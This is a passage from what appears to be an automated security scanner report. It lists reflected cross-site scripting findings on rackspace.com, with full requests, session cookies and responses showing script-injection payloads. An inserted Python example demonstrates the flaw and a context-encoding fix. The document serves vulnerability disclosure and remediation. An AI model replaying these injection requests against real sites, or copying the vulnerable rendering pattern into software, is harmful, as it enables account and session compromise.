User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... vite-wrap" onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/blogs/index.php?32034"><script>alert(1)</script>0aa11522d95=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a42a9db35b45dd84769','custclient','width=500,height=320');return fal ...[SNIP]...
4.129. http://www.rackspace.com/forms/contactsales.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /forms/contactsales.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a26f"><script>alert(1)</script>18575b301b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /forms/contactsales.php?7a26f"><script>alert(1)</script>18575b301b2=1 HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... ap" onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/forms/contactsales.php?7a26f"><script>alert(1)</script>18575b301b2=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a4242353bda923acdd2','custclient','width=500,height=320');return fal ...[SNIP]...
4.130. http://www.rackspace.com/forms/contactsalesconfirmation.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /forms/contactsalesconfirmation.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c581"><script>alert(1)</script>4a0f4d57d54 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /forms/contactsalesconfirmation.php?6c581"><script>alert(1)</script>4a0f4d57d54=1 HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.3.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=5; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... ick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/forms/contactsalesconfirmation.php?6c581"><script>alert(1)</script>4a0f4d57d54=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=2f0f5a42a8503e776f91e0e5','custclient','width=500,height=320');return false;"> ...[SNIP]...
4.131. http://www.rackspace.com/forms/logorequest.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /forms/logorequest.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17cbb"><script>alert(1)</script>68b9e00999b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /forms/logorequest.php?17cbb"><script>alert(1)</script>68b9e00999b=1 HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.3.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=5; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... rap" onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/forms/logorequest.php?17cbb"><script>alert(1)</script>68b9e00999b=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=2f0f5a42a8503e776f91e0e5','custclient','width=500,height=320');return false;"> ...[SNIP]...
4.132. http://www.rackspace.com/forms/solutionpartnerapplication.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /forms/solutionpartnerapplication.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61bbb"><script>alert(1)</script>18701c3bf88 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /forms/solutionpartnerapplication.php?61bbb"><script>alert(1)</script>18701c3bf88=1 HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... k="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/forms/solutionpartnerapplication.php?61bbb"><script>alert(1)</script>18701c3bf88=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=2f0f5a42a8503e776f91e0e5','custclient','width=500,height=320');return false;"> ...[SNIP]...
4.133. http://www.rackspace.com/hosting_knowledge/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /hosting_knowledge/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab12f"><script>alert(1)</script>c842bac33c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ab12f\"><script>alert(1)</script>c842bac33c5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hosting_knowledge/?ab12f"><script>alert(1)</script>c842bac33c5=1 HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43306"><script>alert(1)</script>9a196529920 was submitted in the REST URL parameter 2. This input was echoed as 43306\"><script>alert(1)</script>9a196529920 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hosting_knowledge/index.php43306"><script>alert(1)</script>9a196529920 HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.3.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=5; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
Response
HTTP/1.1 404 Not Found
Date: Sat, 05 Feb 2011 16:00:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
X-Pingback: http://www.rackspace.com/hosting_knowledge/xmlrpc.php
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 05 Feb 2011 16:00:07 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: US4da9da571af9d6d58e6c524219e4d7f8_pagecount=6; expires=Sat, 05-Feb-2011 17:00:07 GMT; path=/; domain=.rackspace.com
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 148266
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/hosting_knowledge/index.php43306\"><script>alert(1)</script>9a196529920&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a42a9db35b45dd84769','custclient','width=500,height=320');return false ...[SNIP]...
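Every instance in this group shares one sink: the current request URL is written into a window.open() call inside a double-quoted onclick attribute, and the only protection observed is a backslash in front of the quotation mark. The Python example below is added here and is not the application's code. Its three rendering functions are hypothetical reconstructions of that sink (the addslashes-style escaping is an assumption; the report only shows the \" in the output), and the sample URL and payload are taken from the request and response above. It uses the standard-library HTML parser to show that the backslash-escaped variant still produces a <script> start tag, and that encoding for each nested context from the inside out (query-parameter value, then JavaScript string literal, then HTML attribute) removes the injection while preserving the original value.

```python
"""Reflected XSS in a double-quoted onclick attribute: why a backslash before
the quote does not help, and how context-by-context encoding fixes it.

Constructed example, not the application's own code. The rendering functions
are hypothetical reconstructions of the sink seen in the report.
"""
import html
import json
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlencode, urlparse

# Constructed inputs, taken from the request/response pair quoted above.
PAGE_URL = "http://www.rackspace.com/hosting_knowledge/index.php"
PAYLOAD = '43306"><script>alert(1)</script>9a196529920'
CHAT_BASE = "https://admin.instantservice.com/Customer?ai=7513&di=39941"


def _chat_link(handler_js: str) -> str:
    """Wrap a JavaScript handler in a double-quoted onclick attribute."""
    return '<a href="#" onclick="' + handler_js + '">Chat</a>'


def render_unescaped(request_url: str) -> str:
    """Vulnerable: the raw request URL is concatenated into the JS string."""
    handler = ("window.open('" + CHAT_BASE + "&optionaldata2=" + request_url
               + "','custclient','width=500,height=320');return false")
    return _chat_link(handler)


def render_backslash_escaped(request_url: str) -> str:
    """Still vulnerable: addslashes-style escaping (assumed) protects the JS
    string literal, but the HTML parser ignores backslashes, so the quote
    still closes the attribute."""
    slashed = (request_url.replace("\\", "\\\\")
               .replace("'", "\\'").replace('"', '\\"'))
    return render_unescaped(slashed)


def render_hardened(request_url: str) -> str:
    """Encode for each context from the inside out:
    1. the URL is a query-parameter value  -> percent-encode it
    2. the whole chat URL is a JS string   -> JSON string literal
    3. the handler is an attribute value   -> HTML-encode, quotes included
    """
    chat_url = CHAT_BASE + "&" + urlencode({"optionaldata2": request_url})
    handler = ("window.open(" + json.dumps(chat_url)
               + ",'custclient','width=500,height=320');return false")
    return _chat_link(html.escape(handler, quote=True))


class _Collector(HTMLParser):
    """Record start tags and the first onclick value as a browser sees them
    (HTMLParser HTML-decodes attribute values, like a browser does)."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.onclick = None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        for name, value in attrs:
            if name == "onclick" and self.onclick is None:
                self.onclick = value


def parse(markup: str) -> _Collector:
    collector = _Collector()
    collector.feed(markup)
    collector.close()
    return collector


def script_tag_injected(markup: str) -> bool:
    """True when a <script> start tag is parsed outside the attribute."""
    return "script" in parse(markup).tags


def recovered_request_url(markup: str) -> str:
    """Decode hardened markup in reverse order (attribute -> JS string ->
    query parameter) to show the original value survives intact."""
    handler = parse(markup).onclick
    start = handler.index("window.open(") + len("window.open(")
    chat_url, _ = json.JSONDecoder().raw_decode(handler, start)
    return parse_qs(urlparse(chat_url).query)["optionaldata2"][0]


if __name__ == "__main__":
    tainted = PAGE_URL + PAYLOAD
    for name, render in [("unescaped", render_unescaped),
                         ("backslash-escaped", render_backslash_escaped),
                         ("hardened", render_hardened)]:
        print(f"{name:18s} script injected: {script_tag_injected(render(tainted))}")
    print("hardened round-trip intact:",
          recovered_request_url(render_hardened(tainted)) == tainted)
```

The order of the encodings matters: the browser decodes the attribute first, then evaluates the handler as JavaScript, and the chat service decodes the query parameter last, so the value must be encoded in the reverse order. Percent-encoding the page URL on its own would already neutralise this payload, but only the full stack protects the attribute and the string literal against inputs that legitimately contain quotes.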
4.135. http://www.rackspace.com/hosting_solutions.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /hosting_solutions.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 778f4"><script>alert(1)</script>b266e48b218 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hosting_solutions.php?778f4"><script>alert(1)</script>b266e48b218=1 HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... rap" onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/hosting_solutions.php?778f4"><script>alert(1)</script>b266e48b218=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a4242353bda923acdd2','custclient','width=500,height=320');return fal ...[SNIP]...
4.136. http://www.rackspace.com/index.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2667a"><script>alert(1)</script>060931ff4d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php?2667a"><script>alert(1)</script>060931ff4d2=1 HTTP/1.1
Host: www.rackspace.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the noflash request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93307"><script>alert(1)</script>52822b1d737 was submitted in the noflash parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php?noflash=true93307"><script>alert(1)</script>52822b1d737 HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
